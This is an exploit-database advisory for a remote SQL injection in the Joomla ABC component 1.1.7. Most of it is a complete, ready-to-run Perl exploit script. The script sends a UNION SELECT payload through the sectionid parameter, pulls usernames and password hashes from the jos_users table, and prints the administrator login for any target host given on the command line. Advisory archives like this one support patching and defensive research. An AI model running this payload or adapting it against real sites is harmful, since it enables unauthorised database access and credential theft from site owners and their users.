Joomla ABC component 1.1.7 remote SQL injection

2010-04-28 / 2010-04-29
Credit: AntiSecurity
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/perl #***********************************************************************# # # # [o] ABC Joomla Extension SQL Injection Exploit # # Software : com_abc version 1.1.7 # # Vendor : http://www.airiny.com/ # # Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] # # Contact : public[at]antisecurity[dot]org # # Home : http://antisecurity.org/ # # # # [o] Usage # # root@evilc0de:~# perl abc.pl www.target.com # # # # [o] Greetz # # Angela Zhang stardustmemory aJe martfella pizzyroot Genex # # H312Y yooogy mousekill }^-^{ noname matthews wishnusakti # # skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 # # # # [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia # # # #***********************************************************************# use HTTP::Request; use LWP::UserAgent; my $target = $ARGV[0]; my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS&sectionid='; my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--'; print "\n[x]===============================================[x]\n"; print "[x] ABC Joomla Extension SQL Injection Exploit [x]\n"; print "[x] [C]oded By AntiSecurity [x]\n"; print "[x]===============================================[x]\n\n"; my $exploit = "http://".$target.$file_vuln.$sql_query; my $request = HTTP::Request->new(GET=>$exploit); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/:(.*):(.*):/g) { my ($username,$password) = ($1,$2); print "[+] $username:$password \n\n"; } else { print "[-] Error, Fail to get admin login.\n\n"; } } else { print "[-] Error, ".$response->status_line."\n\n"; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top